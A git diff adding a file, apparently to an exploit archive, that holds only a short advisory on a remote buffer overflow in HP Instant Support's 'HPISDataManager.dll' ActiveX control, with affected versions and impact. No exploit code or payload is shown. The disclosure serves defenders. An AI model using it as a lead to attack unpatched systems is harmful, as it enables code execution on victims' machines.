new file mode 100755
index 000000000..cc4f2c6b5
--- /dev/null
+++ b/platforms/windows/remote/31873.xml
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/29529/info
+
+HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code in the context of an application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
+
+HP Instant Support 1.0.0.22 and earlier versions are affected.
+
+NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information.
+
+
\ No newline at end of file